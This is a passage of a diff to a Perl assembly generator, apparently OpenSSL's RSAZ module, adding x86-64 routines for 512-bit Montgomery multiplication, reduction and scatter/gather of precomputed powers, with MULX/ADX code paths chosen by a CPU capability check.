+.size	rsaz_512_mul,.-rsaz_512_mul
+___
+}
+{
+my ($out,$ap,$bp,$mod,$n0,$pwr) = ("%rdi","%rsi","%rdx","%rcx","%r8","%r9d");
+$code.=<<___;
+.globl	rsaz_512_mul_gather4
+.type	rsaz_512_mul_gather4,\@function,6
+.align	32
+rsaz_512_mul_gather4:
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+
+	mov	$pwr, $pwr
+	subq	\$128+24, %rsp
+.Lmul_gather4_body:
+___
+$code.=<<___ if ($addx);
+	movl	\$0x80100,%r11d
+	andl	OPENSSL_ia32cap_P+8(%rip),%r11d
+	cmpl	\$0x80100,%r11d		# check for MULX and ADO/CX
+	je	.Lmulx_gather
+___
+$code.=<<___;
+	movl	64($bp,$pwr,4), %eax
+	movq	$out, %xmm0		# off-load arguments
+	movl	($bp,$pwr,4), %ebx
+	movq	$mod, %xmm1
+	movq	$n0, 128(%rsp)
+
+	shlq	\$32, %rax
+	or	%rax, %rbx
+	movq	($ap), %rax
+	 movq	8($ap), %rcx
+	 leaq	128($bp,$pwr,4), %rbp
+	mulq	%rbx			# 0 iteration
+	movq	%rax, (%rsp)
+	movq	%rcx, %rax
+	movq	%rdx, %r8
+
+	mulq	%rbx
+	 movd	(%rbp), %xmm4
+	addq	%rax, %r8
+	movq	16($ap), %rax
+	movq	%rdx, %r9
+	adcq	\$0, %r9
+
+	mulq	%rbx
+	 movd	64(%rbp), %xmm5
+	addq	%rax, %r9
+	movq	24($ap), %rax
+	movq	%rdx, %r10
+	adcq	\$0, %r10
+
+	mulq	%rbx
+	 pslldq	\$4, %xmm5
+	addq	%rax, %r10
+	movq	32($ap), %rax
+	movq	%rdx, %r11
+	adcq	\$0, %r11
+
+	mulq	%rbx
+	 por	%xmm5, %xmm4
+	addq	%rax, %r11
+	movq	40($ap), %rax
+	movq	%rdx, %r12
+	adcq	\$0, %r12
+
+	mulq	%rbx
+	addq	%rax, %r12
+	movq	48($ap), %rax
+	movq	%rdx, %r13
+	adcq	\$0, %r13
+
+	mulq	%rbx
+	 leaq	128(%rbp), %rbp
+	addq	%rax, %r13
+	movq	56($ap), %rax
+	movq	%rdx, %r14
+	adcq	\$0, %r14
+	
+	mulq	%rbx
+	 movq	%xmm4, %rbx
+	addq	%rax, %r14
+	 movq	($ap), %rax
+	movq	%rdx, %r15
+	adcq	\$0, %r15
+
+	leaq	8(%rsp), %rdi
+	movl	\$7, %ecx
+	jmp	.Loop_mul_gather
+
+.align	32
+.Loop_mul_gather:
+	mulq	%rbx
+	addq	%rax, %r8
+	movq	8($ap), %rax
+	movq	%r8, (%rdi)
+	movq	%rdx, %r8
+	adcq	\$0, %r8
+
+	mulq	%rbx
+	 movd	(%rbp), %xmm4
+	addq	%rax, %r9
+	movq	16($ap), %rax
+	adcq	\$0, %rdx
+	addq	%r9, %r8
+	movq	%rdx, %r9
+	adcq	\$0, %r9
+
+	mulq	%rbx
+	 movd	64(%rbp), %xmm5
+	addq	%rax, %r10
+	movq	24($ap), %rax
+	adcq	\$0, %rdx
+	addq	%r10, %r9
+	movq	%rdx, %r10
+	adcq	\$0, %r10
+
+	mulq	%rbx
+	 pslldq	\$4, %xmm5
+	addq	%rax, %r11
+	movq	32($ap), %rax
+	adcq	\$0, %rdx
+	addq	%r11, %r10
+	movq	%rdx, %r11
+	adcq	\$0, %r11
+
+	mulq	%rbx
+	 por	%xmm5, %xmm4
+	addq	%rax, %r12
+	movq	40($ap), %rax
+	adcq	\$0, %rdx
+	addq	%r12, %r11
+	movq	%rdx, %r12
+	adcq	\$0, %r12
+
+	mulq	%rbx
+	addq	%rax, %r13
+	movq	48($ap), %rax
+	adcq	\$0, %rdx
+	addq	%r13, %r12
+	movq	%rdx, %r13
+	adcq	\$0, %r13
+
+	mulq	%rbx
+	addq	%rax, %r14
+	movq	56($ap), %rax
+	adcq	\$0, %rdx
+	addq	%r14, %r13
+	movq	%rdx, %r14
+	adcq	\$0, %r14
+
+	mulq	%rbx
+	 movq	%xmm4, %rbx
+	addq	%rax, %r15
+	 movq	($ap), %rax
+	adcq	\$0, %rdx
+	addq	%r15, %r14
+	movq	%rdx, %r15	
+	adcq	\$0, %r15
+
+	leaq	128(%rbp), %rbp
+	leaq	8(%rdi), %rdi
+
+	decl	%ecx
+	jnz	.Loop_mul_gather
+
+	movq	%r8, (%rdi)
+	movq	%r9, 8(%rdi)
+	movq	%r10, 16(%rdi)
+	movq	%r11, 24(%rdi)
+	movq	%r12, 32(%rdi)
+	movq	%r13, 40(%rdi)
+	movq	%r14, 48(%rdi)
+	movq	%r15, 56(%rdi)
+
+	movq	%xmm0, $out
+	movq	%xmm1, %rbp
+
+	movq	(%rsp), %r8
+	movq	8(%rsp), %r9
+	movq	16(%rsp), %r10
+	movq	24(%rsp), %r11
+	movq	32(%rsp), %r12
+	movq	40(%rsp), %r13
+	movq	48(%rsp), %r14
+	movq	56(%rsp), %r15
+
+	call	__rsaz_512_reduce
+___
+$code.=<<___ if ($addx);
+	jmp	.Lmul_gather_tail
+
+.align	32
+.Lmulx_gather:
+	mov	64($bp,$pwr,4), %eax
+	movq	$out, %xmm0		# off-load arguments
+	lea	128($bp,$pwr,4), %rbp
+	mov	($bp,$pwr,4), %edx
+	movq	$mod, %xmm1
+	mov	$n0, 128(%rsp)
+
+	shl	\$32, %rax
+	or	%rax, %rdx
+	mulx	($ap), %rbx, %r8	# 0 iteration
+	mov	%rbx, (%rsp)
+	xor	%edi, %edi		# cf=0, of=0
+
+	mulx	8($ap), %rax, %r9
+	 movd	(%rbp), %xmm4
+
+	mulx	16($ap), %rbx, %r10
+	 movd	64(%rbp), %xmm5
+	adcx	%rax, %r8
+
+	mulx	24($ap), %rax, %r11
+	 pslldq	\$4, %xmm5
+	adcx	%rbx, %r9
+
+	mulx	32($ap), %rbx, %r12
+	 por	%xmm5, %xmm4
+	adcx	%rax, %r10
+
+	mulx	40($ap), %rax, %r13
+	adcx	%rbx, %r11
+
+	mulx	48($ap), %rbx, %r14
+	 lea	128(%rbp), %rbp
+	adcx	%rax, %r12
+	
+	mulx	56($ap), %rax, %r15
+	 movq	%xmm4, %rdx
+	adcx	%rbx, %r13
+	adcx	%rax, %r14
+	mov	%r8, %rbx
+	adcx	%rdi, %r15		# %rdi is 0
+
+	mov	\$-7, %rcx
+	jmp	.Loop_mulx_gather
+
+.align	32
+.Loop_mulx_gather:
+	mulx	($ap), %rax, %r8
+	adcx	%rax, %rbx
+	adox	%r9, %r8
+
+	mulx	8($ap), %rax, %r9
+	.byte	0x66,0x0f,0x6e,0xa5,0x00,0x00,0x00,0x00		# movd	(%rbp), %xmm4
+	adcx	%rax, %r8
+	adox	%r10, %r9
+
+	mulx	16($ap), %rax, %r10
+	 movd	64(%rbp), %xmm5
+	 lea	128(%rbp), %rbp
+	adcx	%rax, %r9
+	adox	%r11, %r10
+
+	.byte	0xc4,0x62,0xfb,0xf6,0x9e,0x18,0x00,0x00,0x00	# mulx	24($ap), %rax, %r11
+	 pslldq	\$4, %xmm5
+	 por	%xmm5, %xmm4
+	adcx	%rax, %r10
+	adox	%r12, %r11
+
+	mulx	32($ap), %rax, %r12
+	adcx	%rax, %r11
+	adox	%r13, %r12
+
+	mulx	40($ap), %rax, %r13
+	adcx	%rax, %r12
+	adox	%r14, %r13
+
+	.byte	0xc4,0x62,0xfb,0xf6,0xb6,0x30,0x00,0x00,0x00	# mulx	48($ap), %rax, %r14
+	adcx	%rax, %r13
+	adox	%r15, %r14
+
+	mulx	56($ap), %rax, %r15
+	 movq	%xmm4, %rdx
+	 mov	%rbx, 64(%rsp,%rcx,8)
+	adcx	%rax, %r14
+	adox	%rdi, %r15
+	mov	%r8, %rbx
+	adcx	%rdi, %r15		# cf=0
+
+	inc	%rcx			# of=0
+	jnz	.Loop_mulx_gather
+
+	mov	%r8, 64(%rsp)
+	mov	%r9, 64+8(%rsp)
+	mov	%r10, 64+16(%rsp)
+	mov	%r11, 64+24(%rsp)
+	mov	%r12, 64+32(%rsp)
+	mov	%r13, 64+40(%rsp)
+	mov	%r14, 64+48(%rsp)
+	mov	%r15, 64+56(%rsp)
+
+	movq	%xmm0, $out
+	movq	%xmm1, %rbp
+
+	mov	128(%rsp), %rdx		# pull $n0
+	mov	(%rsp), %r8
+	mov	8(%rsp), %r9
+	mov	16(%rsp), %r10
+	mov	24(%rsp), %r11
+	mov	32(%rsp), %r12
+	mov	40(%rsp), %r13
+	mov	48(%rsp), %r14
+	mov	56(%rsp), %r15
+
+	call	__rsaz_512_reducex
+
+.Lmul_gather_tail:
+___
+$code.=<<___;
+	addq	64(%rsp), %r8
+	adcq	72(%rsp), %r9
+	adcq	80(%rsp), %r10
+	adcq	88(%rsp), %r11
+	adcq	96(%rsp), %r12
+	adcq	104(%rsp), %r13
+	adcq	112(%rsp), %r14
+	adcq	120(%rsp), %r15
+	sbbq	%rcx, %rcx
+
+	call	__rsaz_512_subtract
+
+	leaq	128+24+48(%rsp), %rax
+	movq	-48(%rax), %r15
+	movq	-40(%rax), %r14
+	movq	-32(%rax), %r13
+	movq	-24(%rax), %r12
+	movq	-16(%rax), %rbp
+	movq	-8(%rax), %rbx
+	leaq	(%rax), %rsp
+.Lmul_gather4_epilogue:
+	ret
+.size	rsaz_512_mul_gather4,.-rsaz_512_mul_gather4
+___
+}
+{
+my ($out,$ap,$mod,$n0,$tbl,$pwr) = ("%rdi","%rsi","%rdx","%rcx","%r8","%r9d");
+$code.=<<___;
+.globl	rsaz_512_mul_scatter4
+.type	rsaz_512_mul_scatter4,\@function,6
+.align	32
+rsaz_512_mul_scatter4:
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+
+	mov	$pwr, $pwr
+	subq	\$128+24, %rsp
+.Lmul_scatter4_body:
+	leaq	($tbl,$pwr,4), $tbl
+	movq	$out, %xmm0		# off-load arguments
+	movq	$mod, %xmm1
+	movq	$tbl, %xmm2
+	movq	$n0, 128(%rsp)
+
+	movq	$out, %rbp
+___
+$code.=<<___ if ($addx);
+	movl	\$0x80100,%r11d
+	andl	OPENSSL_ia32cap_P+8(%rip),%r11d
+	cmpl	\$0x80100,%r11d		# check for MULX and ADO/CX
+	je	.Lmulx_scatter
+___
+$code.=<<___;
+	movq	($out),%rbx		# pass b[0]
+	call	__rsaz_512_mul
+
+	movq	%xmm0, $out
+	movq	%xmm1, %rbp
+
+	movq	(%rsp), %r8
+	movq	8(%rsp), %r9
+	movq	16(%rsp), %r10
+	movq	24(%rsp), %r11
+	movq	32(%rsp), %r12
+	movq	40(%rsp), %r13
+	movq	48(%rsp), %r14
+	movq	56(%rsp), %r15
+
+	call	__rsaz_512_reduce
+___
+$code.=<<___ if ($addx);
+	jmp	.Lmul_scatter_tail
+	
+.align	32
+.Lmulx_scatter:
+	movq	($out), %rdx		# pass b[0]
+	call	__rsaz_512_mulx
+
+	movq	%xmm0, $out
+	movq	%xmm1, %rbp
+
+	movq	128(%rsp), %rdx		# pull $n0
+	movq	(%rsp), %r8
+	movq	8(%rsp), %r9
+	movq	16(%rsp), %r10
+	movq	24(%rsp), %r11
+	movq	32(%rsp), %r12
+	movq	40(%rsp), %r13
+	movq	48(%rsp), %r14
+	movq	56(%rsp), %r15
+
+	call	__rsaz_512_reducex
+
+.Lmul_scatter_tail:
+___
+$code.=<<___;
+	addq	64(%rsp), %r8
+	adcq	72(%rsp), %r9
+	adcq	80(%rsp), %r10
+	adcq	88(%rsp), %r11
+	adcq	96(%rsp), %r12
+	adcq	104(%rsp), %r13
+	adcq	112(%rsp), %r14
+	adcq	120(%rsp), %r15
+	movq	%xmm2, $inp
+	sbbq	%rcx, %rcx
+
+	call	__rsaz_512_subtract
+
+	movl	%r8d, 64*0($inp)	# scatter
+	shrq	\$32, %r8
+	movl	%r9d, 64*2($inp)
+	shrq	\$32, %r9
+	movl	%r10d, 64*4($inp)
+	shrq	\$32, %r10
+	movl	%r11d, 64*6($inp)
+	shrq	\$32, %r11
+	movl	%r12d, 64*8($inp)
+	shrq	\$32, %r12
+	movl	%r13d, 64*10($inp)
+	shrq	\$32, %r13
+	movl	%r14d, 64*12($inp)
+	shrq	\$32, %r14
+	movl	%r15d, 64*14($inp)
+	shrq	\$32, %r15
+	movl	%r8d, 64*1($inp)
+	movl	%r9d, 64*3($inp)
+	movl	%r10d, 64*5($inp)
+	movl	%r11d, 64*7($inp)
+	movl	%r12d, 64*9($inp)
+	movl	%r13d, 64*11($inp)
+	movl	%r14d, 64*13($inp)
+	movl	%r15d, 64*15($inp)
+
+	leaq	128+24+48(%rsp), %rax
+	movq	-48(%rax), %r15
+	movq	-40(%rax), %r14
+	movq	-32(%rax), %r13
+	movq	-24(%rax), %r12
+	movq	-16(%rax), %rbp
+	movq	-8(%rax), %rbx
+	leaq	(%rax), %rsp
+.Lmul_scatter4_epilogue:
+	ret
+.size	rsaz_512_mul_scatter4,.-rsaz_512_mul_scatter4
+___
+}
+{
+my ($out,$inp,$mod,$n0) = ("%rdi","%rsi","%rdx","%rcx");
+$code.=<<___;
+.globl	rsaz_512_mul_by_one
+.type	rsaz_512_mul_by_one,\@function,4
+.align	32
+rsaz_512_mul_by_one:
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+
+	subq	\$128+24, %rsp
+.Lmul_by_one_body:
+___
+$code.=<<___ if ($addx);
+	movl	OPENSSL_ia32cap_P+8(%rip),%eax
+___
+$code.=<<___;
+	movq	$mod, %rbp	# reassign argument
+	movq	$n0, 128(%rsp)
+
+	movq	($inp), %r8
+	pxor	%xmm0, %xmm0
+	movq	8($inp), %r9
+	movq	16($inp), %r10
+	movq	24($inp), %r11
+	movq	32($inp), %r12
+	movq	40($inp), %r13
+	movq	48($inp), %r14
+	movq	56($inp), %r15
+
+	movdqa	%xmm0, (%rsp)
+	movdqa	%xmm0, 16(%rsp)
+	movdqa	%xmm0, 32(%rsp)
+	movdqa	%xmm0, 48(%rsp)
+	movdqa	%xmm0, 64(%rsp)
+	movdqa	%xmm0, 80(%rsp)
+	movdqa	%xmm0, 96(%rsp)
+___
+$code.=<<___ if ($addx);
+	andl	\$0x80100,%eax
+	cmpl	\$0x80100,%eax		# check for MULX and ADO/CX
+	je	.Lby_one_callx
+___
+$code.=<<___;
+	call	__rsaz_512_reduce
+___
+$code.=<<___ if ($addx);
+	jmp	.Lby_one_tail
+.align	32
+.Lby_one_callx:
+	movq	128(%rsp), %rdx		# pull $n0
+	call	__rsaz_512_reducex
+.Lby_one_tail:
+___
+$code.=<<___;
+	movq	%r8, ($out)
+	movq	%r9, 8($out)
+	movq	%r10, 16($out)
+	movq	%r11, 24($out)
+	movq	%r12, 32($out)
+	movq	%r13, 40($out)
+	movq	%r14, 48($out)
+	movq	%r15, 56($out)
+
+	leaq	128+24+48(%rsp), %rax
+	movq	-48(%rax), %r15
+	movq	-40(%rax), %r14
+	movq	-32(%rax), %r13
+	movq	-24(%rax), %r12
+	movq	-16(%rax), %rbp
+	movq	-8(%rax), %rbx
+	leaq	(%rax), %rsp
+.Lmul_by_one_epilogue:
+	ret
+.size	rsaz_512_mul_by_one,.-rsaz_512_mul_by_one
+___
+}
+{	# __rsaz_512_reduce
+	#
+	# input:	%r8-%r15, %rbp - mod, 128(%rsp) - n0
+	# output:	%r8-%r15
+	# clobbers:	everything except %rbp and %rdi
+$code.=<<___;
+.type	__rsaz_512_reduce,\@abi-omnipotent
+.align	32
+__rsaz_512_reduce:
+	movq	%r8, %rbx
+	imulq	128+8(%rsp), %rbx
+	movq	0(%rbp), %rax
+	movl	\$8, %ecx
+	jmp	.Lreduction_loop
+
+.align	32
+.Lreduction_loop:
+	mulq	%rbx
+	movq	8(%rbp), %rax
+	negq	%r8
+	movq	%rdx, %r8
+	adcq	\$0, %r8
+
+	mulq	%rbx
+	addq	%rax, %r9
+	movq	16(%rbp), %rax
+	adcq	\$0, %rdx
+	addq	%r9, %r8
+	movq	%rdx, %r9
+	adcq	\$0, %r9
+
+	mulq	%rbx
+	addq	%rax, %r10
+	movq	24(%rbp), %rax
+	adcq	\$0, %rdx
+	addq	%r10, %r9
+	movq	%rdx, %r10
+	adcq	\$0, %r10
+
+	mulq	%rbx
+	addq	%rax, %r11
+	movq	32(%rbp), %rax
+	adcq	\$0, %rdx
+	addq	%r11, %r10
+	 movq	128+8(%rsp), %rsi
+	#movq	%rdx, %r11
+	#adcq	\$0, %r11
+	adcq	\$0, %rdx
+	movq	%rdx, %r11
+
+	mulq	%rbx
+	addq	%rax, %r12
+	movq	40(%rbp), %rax
+	adcq	\$0, %rdx
+	 imulq	%r8, %rsi
+	addq	%r12, %r11
+	movq	%rdx, %r12
+	adcq	\$0, %r12
+
+	mulq	%rbx
+	addq	%rax, %r13
+	movq	48(%rbp), %rax
+	adcq	\$0, %rdx
+	addq	%r13, %r12
+	movq	%rdx, %r13
+	adcq	\$0, %r13
+
+	mulq	%rbx
+	addq	%rax, %r14
+	movq	56(%rbp), %rax
+	adcq	\$0, %rdx
+	addq	%r14, %r13
+	movq	%rdx, %r14
+	adcq	\$0, %r14
+
+	mulq	%rbx
+	 movq	%rsi, %rbx
+	addq	%rax, %r15
+	 movq	0(%rbp), %rax
+	adcq	\$0, %rdx
+	addq	%r15, %r14
+	movq	%rdx, %r15
+	adcq	\$0, %r15
+
+	decl	%ecx
+	jne	.Lreduction_loop
+
+	ret
+.size	__rsaz_512_reduce,.-__rsaz_512_reduce
+___
+}
+if ($addx) {
+	# __rsaz_512_reducex
+	#
+	# input:	%r8-%r15, %rbp - mod, 128(%rsp) - n0
+	# output:	%r8-%r15
+	# clobbers:	everything except %rbp and %rdi
+$code.=<<___;
+.type	__rsaz_512_reducex,\@abi-omnipotent
+.align	32
+__rsaz_512_reducex:
+	#movq	128+8(%rsp), %rdx		# pull $n0
+	imulq	%r8, %rdx
+	xorq	%rsi, %rsi			# cf=0,of=0
+	movl	\$8, %ecx
+	jmp	.Lreduction_loopx
+
+.align	32
+.Lreduction_loopx:
+	mov	%r8, %rbx
+	mulx	0(%rbp), %rax, %r8
+	adcx	%rbx, %rax
+	adox	%r9, %r8
+
+	mulx	8(%rbp), %rax, %r9
+	adcx	%rax, %r8
+	adox	%r10, %r9
+
+	mulx	16(%rbp), %rbx, %r10
+	adcx	%rbx, %r9
+	adox	%r11, %r10
+
+	mulx	24(%rbp), %rbx, %r11
+	adcx	%rbx, %r10
+	adox	%r12, %r11
+
+	.byte	0xc4,0x62,0xe3,0xf6,0xa5,0x20,0x00,0x00,0x00	# mulx	32(%rbp), %rbx, %r12
+	 mov	%rdx, %rax
+	 mov	%r8, %rdx
+	adcx	%rbx, %r11
+	adox	%r13, %r12
+
+	 mulx	128+8(%rsp), %rbx, %rdx
+	 mov	%rax, %rdx
+
+	mulx	40(%rbp), %rax, %r13
+	adcx	%rax, %r12
+	adox	%r14, %r13
+
+	.byte	0xc4,0x62,0xfb,0xf6,0xb5,0x30,0x00,0x00,0x00	# mulx	48(%rbp), %rax, %r14
+	adcx	%rax, %r13
+	adox	%r15, %r14
+
+	mulx	56(%rbp), %rax, %r15
+	 mov	%rbx, %rdx
+	adcx	%rax, %r14
+	adox	%rsi, %r15			# %rsi is 0
+	adcx	%rsi, %r15			# cf=0
+
+	decl	%ecx				# of=0
+	jne	.Lreduction_loopx
+
+	ret
+.size	__rsaz_512_reducex,.-__rsaz_512_reducex
+___
+}
+{	# __rsaz_512_subtract
+	# input: %r8-%r15, %rdi - $out, %rbp - $mod, %rcx - mask
+	# output:
+	# clobbers: everything but %rdi, %rsi and %rbp
+$code.=<<___;
+.type	__rsaz_512_subtract,\@abi-omnipotent
+.align	32
+__rsaz_512_subtract:
+	movq	%r8, ($out)
+	movq	%r9, 8($out)
+	movq	%r10, 16($out)
+	movq	%r11, 24($out)
+	movq	%r12, 32($out)
+	movq	%r13, 40($out)
+	movq	%r14, 48($out)
+	movq	%r15, 56($out)
+
+	movq	0($mod), %r8
+	movq	8($mod), %r9
+	negq	%r8
+	notq	%r9
+	andq	%rcx, %r8
+	movq	16($mod), %r10
+	andq	%rcx, %r9
+	notq	%r10
+	movq	24($mod), %r11
+	andq	%rcx, %r10
+	notq	%r11
+	movq	32($mod), %r12
+	andq	%rcx, %r11
+	notq	%r12
+	movq	40($mod), %r13
+	andq	%rcx, %r12
+	notq	%r13
+	movq	48($mod), %r14
+	andq	%rcx, %r13
+	notq	%r14
+	movq	56($mod), %r15
+	andq	%rcx, %r14
+	notq	%r15
+	andq	%rcx, %r15
+
+	addq	($out), %r8
+	adcq	8($out), %r9
+	adcq	16($out), %r10
+	adcq	24($out), %r11
+	adcq	32($out), %r12
+	adcq	40($out), %r13
+	adcq	48($out), %r14
+	adcq	56($out), %r15
+
+	movq	%r8, ($out)
+	movq	%r9, 8($out)
+	movq	%r10, 16($out)
+	movq	%r11, 24($out)
+	movq	%r12, 32($out)
+	movq	%r13, 40($out)
+	movq	%r14, 48($out)
+	movq	%r15, 56($out)
+
+	ret
+.size	__rsaz_512_subtract,.-__rsaz_512_subtract
+___
+}
+{	# __rsaz_512_mul
+	#
+	# input: %rsi - ap, %rbp - bp
+	# ouput:
+	# clobbers: everything
+my ($ap,$bp) = ("%rsi","%rbp");
+$code.=<<___;
+.type	__rsaz_512_mul,\@abi-omnipotent
+.align	32
+__rsaz_512_mul:
+	leaq	8(%rsp), %rdi
+
+	movq	($ap), %rax
+	mulq	%rbx
+	movq	%rax, (%rdi)
+	movq	8($ap), %rax
+	movq	%rdx, %r8
+
+	mulq	%rbx
+	addq	%rax, %r8
+	movq	16($ap), %rax
+	movq	%rdx, %r9
+	adcq	\$0, %r9
+
+	mulq	%rbx
+	addq	%rax, %r9
+	movq	24($ap), %rax
+	movq	%rdx, %r10
+	adcq	\$0, %r10
+
+	mulq	%rbx
+	addq	%rax, %r10
+	movq	32($ap), %rax
+	movq	%rdx, %r11
+	adcq	\$0, %r11
+
+	mulq	%rbx
+	addq	%rax, %r11
+	movq	40($ap), %rax
+	movq	%rdx, %r12
+	adcq	\$0, %r12
+
+	mulq	%rbx
+	addq	%rax, %r12
+	movq	48($ap), %rax
+	movq	%rdx, %r13
+	adcq	\$0, %r13
+
+	mulq	%rbx
+	addq	%rax, %r13
+	movq	56($ap), %rax
+	movq	%rdx, %r14
+	adcq	\$0, %r14
+	
+	mulq	%rbx
+	addq	%rax, %r14
+	 movq	($ap), %rax
+	movq	%rdx, %r15
+	adcq	\$0, %r15
+
+	leaq	8($bp), $bp
+	leaq	8(%rdi), %rdi
+
+	movl	\$7, %ecx
+	jmp	.Loop_mul
+
+.align	32
+.Loop_mul:
+	movq	($bp), %rbx
+	mulq	%rbx
+	addq	%rax, %r8
+	movq	8($ap), %rax
+	movq	%r8, (%rdi)
+	movq	%rdx, %r8
+	adcq	\$0, %r8
+
+	mulq	%rbx
+	addq	%rax, %r9
+	movq	16($ap), %rax
+	adcq	\$0, %rdx
+	addq	%r9, %r8
+	movq	%rdx, %r9
+	adcq	\$0, %r9
+
+	mulq	%rbx
+	addq	%rax, %r10
+	movq	24($ap), %rax
+	adcq	\$0, %rdx
+	addq	%r10, %r9
+	movq	%rdx, %r10
+	adcq	\$0, %r10
+
+	mulq	%rbx
+	addq	%rax, %r11
+	movq	32($ap), %rax
+	adcq	\$0, %rdx
+	addq	%r11, %r10
+	movq	%rdx, %r11
+	adcq	\$0, %r11
+
+	mulq	%rbx
+	addq	%rax, %r12
+	movq	40($ap), %rax
+	adcq	\$0, %rdx
+	addq	%r12, %r11
+	movq	%rdx, %r12
+	adcq	\$0, %r12
+
+	mulq	%rbx
+	addq	%rax, %r13
+	movq	48($ap), %rax
+	adcq	\$0, %rdx
+	addq	%r13, %r12
+	movq	%rdx, %r13
+	adcq	\$0, %r13
+
+	mulq	%rbx
+	addq	%rax, %r14
+	movq	56($ap), %rax
+	adcq	\$0, %rdx
+	addq	%r14, %r13
+	movq	%rdx, %r14
+	 leaq	8($bp), $bp
+	adcq	\$0, %r14
+
+	mulq	%rbx
+	addq	%rax, %r15
+	 movq	($ap), %rax
+	adcq	\$0, %rdx
+	addq	%r15, %r14
+	movq	%rdx, %r15	
+	adcq	\$0, %r15
+
+	leaq	8(%rdi), %rdi
+
+	decl	%ecx
+	jnz	.Loop_mul
+
+	movq	%r8, (%rdi)
+	movq	%r9, 8(%rdi)
+	movq	%r10, 16(%rdi)
+	movq	%r11, 24(%rdi)
+	movq	%r12, 32(%rdi)
+	movq	%r13, 40(%rdi)
+	movq	%r14, 48(%rdi)
+	movq	%r15, 56(%rdi)
+
+	ret
+.size	__rsaz_512_mul,.-__rsaz_512_mul
+___
+}
+if ($addx) {
+	# __rsaz_512_mulx
+	#
+	# input: %rsi - ap, %rbp - bp
+	# ouput:
+	# clobbers: everything
+my ($ap,$bp,$zero) = ("%rsi","%rbp","%rdi");
+$code.=<<___;
+.type	__rsaz_512_mulx,\@abi-omnipotent
+.align	32
+__rsaz_512_mulx:
+	mulx	($ap), %rbx, %r8	# initial %rdx preloaded by caller
+	mov	\$-6, %rcx
+
+	mulx	8($ap), %rax, %r9
+	movq	%rbx, 8(%rsp)
+
+	mulx	16($ap), %rbx, %r10
+	adc	%rax, %r8
+
+	mulx	24($ap), %rax, %r11
+	adc	%rbx, %r9
+
+	mulx	32($ap), %rbx, %r12
+	adc	%rax, %r10
+
+	mulx	40($ap), %rax, %r13
+	adc	%rbx, %r11
+
+	mulx	48($ap), %rbx, %r14
+	adc	%rax, %r12
+
+	mulx	56($ap), %rax, %r15
+	 mov	8($bp), %rdx
+	adc	%rbx, %r13
+	adc	%rax, %r14
+	adc	\$0, %r15
+
+	xor	$zero, $zero		# cf=0,of=0
+	jmp	.Loop_mulx
+
+.align	32
+.Loop_mulx:
+	movq	%r8, %rbx
+	mulx	($ap), %rax, %r8
+	adcx	%rax, %rbx
+	adox	%r9, %r8
+
+	mulx	8($ap), %rax, %r9
+	adcx	%rax, %r8
+	adox	%r10, %r9
+
+	mulx	16($ap), %rax, %r10
+	adcx	%rax, %r9
+	adox	%r11, %r10
+
+	mulx	24($ap), %rax, %r11
+	adcx	%rax, %r10
+	adox	%r12, %r11
+
+	.byte	0x3e,0xc4,0x62,0xfb,0xf6,0xa6,0x20,0x00,0x00,0x00	# mulx	32($ap), %rax, %r12
+	adcx	%rax, %r11
+	adox	%r13, %r12
+
+	mulx	40($ap), %rax, %r13
+	adcx	%rax, %r12
+	adox	%r14, %r13
+
+	mulx	48($ap), %rax, %r14
+	adcx	%rax, %r13
+	adox	%r15, %r14
+
+	mulx	56($ap), %rax, %r15
+	 movq	64($bp,%rcx,8), %rdx
+	 movq	%rbx, 8+64-8(%rsp,%rcx,8)
+	adcx	%rax, %r14
+	adox	$zero, %r15
+	adcx	$zero, %r15		# cf=0
+
+	inc	%rcx			# of=0
+	jnz	.Loop_mulx
+
+	movq	%r8, %rbx
+	mulx	($ap), %rax, %r8
+	adcx	%rax, %rbx
+	adox	%r9, %r8
+
+	.byte	0xc4,0x62,0xfb,0xf6,0x8e,0x08,0x00,0x00,0x00	# mulx	8($ap), %rax, %r9
+	adcx	%rax, %r8
+	adox	%r10, %r9
+
+	.byte	0xc4,0x62,0xfb,0xf6,0x96,0x10,0x00,0x00,0x00	# mulx	16($ap), %rax, %r10
+	adcx	%rax, %r9
+	adox	%r11, %r10
+
+	mulx	24($ap), %rax, %r11
+	adcx	%rax, %r10
+	adox	%r12, %r11
+
+	mulx	32($ap), %rax, %r12
+	adcx	%rax, %r11
+	adox	%r13, %r12
+
+	mulx	40($ap), %rax, %r13
+	adcx	%rax, %r12
+	adox	%r14, %r13
+
+	.byte	0xc4,0x62,0xfb,0xf6,0xb6,0x30,0x00,0x00,0x00	# mulx	48($ap), %rax, %r14
+	adcx	%rax, %r13
+	adox	%r15, %r14
+
+	.byte	0xc4,0x62,0xfb,0xf6,0xbe,0x38,0x00,0x00,0x00	# mulx	56($ap), %rax, %r15
+	adcx	%rax, %r14
+	adox	$zero, %r15
+	adcx	$zero, %r15
+
+	mov	%rbx, 8+64-8(%rsp)
+	mov	%r8, 8+64(%rsp)
+	mov	%r9, 8+64+8(%rsp)
+	mov	%r10, 8+64+16(%rsp)
+	mov	%r11, 8+64+24(%rsp)
+	mov	%r12, 8+64+32(%rsp)
+	mov	%r13, 8+64+40(%rsp)
+	mov	%r14, 8+64+48(%rsp)
+	mov	%r15, 8+64+56(%rsp)
+
+	ret
+.size	__rsaz_512_mulx,.-__rsaz_512_mulx
+___
+}
+{
+my ($out,$inp,$power)= $win64 ? ("%rcx","%rdx","%r8d") : ("%rdi","%rsi","%edx");
+$code.=<<___;
+.globl	rsaz_512_scatter4
+.type	rsaz_512_scatter4,\@abi-omnipotent
+.align	16
+rsaz_512_scatter4:
+	leaq	($out,$power,4), $out
+	movl	\$8, %r9d
+	jmp	.Loop_scatter
+.align	16
+.Loop_scatter:
+	movq	($inp), %rax
+	leaq	8($inp), $inp
+	movl	%eax, ($out)
+	shrq	\$32, %rax
+	movl	%eax, 64($out)
+	leaq	128($out), $out
+	decl	%r9d
+	jnz	.Loop_scatter
+	ret
+.size	rsaz_512_scatter4,.-rsaz_512_scatter4
+
+.globl	rsaz_512_gather4
+.type	rsaz_512_gather4,\@abi-omnipotent
+.align	16
+rsaz_512_gather4:
+	leaq	($inp,$power,4), $inp
+	movl	\$8, %r9d
+	jmp	.Loop_gather
+.align	16
+.Loop_gather:
+	movl	($inp), %eax
+	movl	64($inp), %r8d
+	leaq	128($inp), $inp
+	shlq	\$32, %r8
+	or	%r8, %rax
+	movq	%rax, ($out)
+	leaq	8($out), $out
+	decl	%r9d
+	jnz	.Loop_gather
+	ret
